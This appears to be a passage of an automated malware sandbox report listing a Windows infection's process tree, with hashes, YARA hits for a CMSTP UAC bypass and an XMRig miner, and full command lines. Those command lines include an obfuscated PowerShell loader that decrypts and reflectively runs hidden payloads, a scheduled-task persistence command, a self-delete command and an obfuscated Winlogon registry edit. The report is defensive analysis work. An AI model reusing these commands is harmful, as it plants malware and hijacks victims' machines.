                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:15:57:10
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\upx.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\upx.exe
                                                                                      Imagebase:0x2d0000
                                                                                      File size:5'632 bytes
                                                                                      MD5 hash:78CC94F417D1BE1A25ACE9F52D52E23D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:15:57:10
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:15:57:10
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\Temp\ydztkyrb.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\temp\ydztkyrb.exe
                                                                                      Imagebase:0xdf0000
                                                                                      File size:134'656 bytes
                                                                                      MD5 hash:D11D4C3E52A34767568FA7AEAB4200A7
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:15:57:10
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\taskkill.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:taskkill /IM cmstp.exe /F
                                                                                      Imagebase:0x7ff797a80000
                                                                                      File size:101'376 bytes
                                                                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:21
                                                                                      Start time:15:57:10
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:22
                                                                                      Start time:15:57:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\cmstp.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf
                                                                                      Imagebase:0x7ff72a5e0000
                                                                                      File size:98'304 bytes
                                                                                      MD5 hash:4CC43FE4D397FF79FA69F397E016DF52
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2180849351.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2179819804.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2182071247.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2181557255.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2182890812.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2182018104.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2178163407.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.2182426315.0000021D30380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:24
                                                                                      Start time:15:57:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd /c start C:\Windows\temp\swtpd1aw.exe
                                                                                      Imagebase:0x7ff7ad7e0000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:25
                                                                                      Start time:15:57:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:26
                                                                                      Start time:15:57:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\Temp\swtpd1aw.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\temp\swtpd1aw.exe
                                                                                      Imagebase:0xd40000
                                                                                      File size:134'656 bytes
                                                                                      MD5 hash:D11D4C3E52A34767568FA7AEAB4200A7
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:27
                                                                                      Start time:15:57:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\taskkill.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:taskkill /IM cmstp.exe /F
                                                                                      Imagebase:0x7ff797a80000
                                                                                      File size:101'376 bytes
                                                                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:28
                                                                                      Start time:15:57:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:29
                                                                                      Start time:15:57:27
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /F /TN "taskmoder" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\taskmoder.exe" /RL HIGHEST
                                                                                      Imagebase:0x7ff6ec350000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:30
                                                                                      Start time:15:57:27
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:31
                                                                                      Start time:15:57:27
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\taskmoder.exe"
                                                                                      Imagebase:0x4d0000
                                                                                      File size:502'784 bytes
                                                                                      MD5 hash:2A48F51475C2EB426B304DDDCF3F85F5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000000.2318415133.000000000051A000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\taskmoder.exe, Author: Joe Security
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:32
                                                                                      Start time:15:57:27
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\taskmen.exe"
                                                                                      Imagebase:0xb50000
                                                                                      File size:1'006'080 bytes
                                                                                      MD5 hash:EFA5846830C8A002235AC1768295C1B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:33
                                                                                      Start time:15:57:28
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      Imagebase:0xa90000
                                                                                      File size:502'784 bytes
                                                                                      MD5 hash:2A48F51475C2EB426B304DDDCF3F85F5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:34
                                                                                      Start time:15:57:34
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\Client.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Client.exe"
                                                                                      Imagebase:0x7ff6fdbf0000
                                                                                      File size:817'664 bytes
                                                                                      MD5 hash:0CA491B3E2BBE82AA76F5BB94E8F2143
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 70%, ReversingLabs
                                                                                      • Detection: 53%, Virustotal, Browse
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:35
                                                                                      Start time:15:57:36
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                                                                                      Imagebase:0x180000
                                                                                      File size:463'360 bytes
                                                                                      MD5 hash:A4E804239AE09E3A23A4020C226B188C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 75%, ReversingLabs
                                                                                      • Detection: 55%, Virustotal, Browse
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:37
                                                                                      Start time:15:57:41
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                                                                                      Imagebase:0x750000
                                                                                      File size:463'360 bytes
                                                                                      MD5 hash:A4E804239AE09E3A23A4020C226B188C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:40
                                                                                      Start time:15:57:45
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Windows\fail.bat"
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:41
                                                                                      Start time:15:57:45
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6a5670000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:42
                                                                                      Start time:15:57:53
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($param_var,$param2_var){ $aTurZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxyRp=$aTurZ.EntryPoint; $kxyRp.Invoke($null, $param2_var);}$iIPOn = 'C:\Windows\fail.bat';$host.UI.RawUI.WindowTitle = $iIPOn;$JhMMH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iIPOn).Split([Environment]::NewLine);foreach ($ELdqw in $JhMMH) { if ($ELdqw.StartsWith('nZYsDSkVsFscZBoRZGdc')) { $wHkKi=$ELdqw.Substring(20); break; }}$payloads_var=[string[]]$wHkKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:43
                                                                                      Start time:15:57:53
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                      Imagebase:0xc20000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:44
                                                                                      Start time:15:57:56
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\Client (1).vmp.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Client (1).vmp.exe"
                                                                                      Imagebase:0xd80000
                                                                                      File size:463'360 bytes
                                                                                      MD5 hash:A4E804239AE09E3A23A4020C226B188C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 75%, ReversingLabs
                                                                                      • Detection: 55%, Virustotal, Browse
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:47
                                                                                      Start time:15:57:58
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\Client (1).vmp.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Client (1).vmp.exe"
                                                                                      Imagebase:0x570000
                                                                                      File size:463'360 bytes
                                                                                      MD5 hash:A4E804239AE09E3A23A4020C226B188C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:48
                                                                                      Start time:15:58:05
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\taskmoder.exe"
                                                                                      Imagebase:0x8b0000
                                                                                      File size:502'784 bytes
                                                                                      MD5 hash:2A48F51475C2EB426B304DDDCF3F85F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:49
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "taskmoder.exe"
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:50
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:51
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe"
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:52
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:53
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:choice /C Y /N /D Y /T 3
                                                                                      Imagebase:0xf80000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:54
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe"
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:55
                                                                                      Start time:15:58:13
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:56
                                                                                      Start time:15:58:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                                                                                      Imagebase:0x3e0000
                                                                                      File size:147'456 bytes
                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:57
                                                                                      Start time:15:58:14
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                                                                                      Imagebase:0x3e0000
                                                                                      File size:147'456 bytes
                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:59
                                                                                      Start time:15:58:15
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\wscript.exe" "C:\ProgramData\izjuqhimv.vbs"
                                                                                      Imagebase:0x3e0000
                                                                                      File size:147'456 bytes
                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:60
                                                                                      Start time:15:58:15
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c @echo off Set a1zr=YNB0FrMP4GIJbxjaqUsk6Cc5ERiHfyAhvwD31pOL7WdnQSKtu8goe2lTX9ZmzV cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% 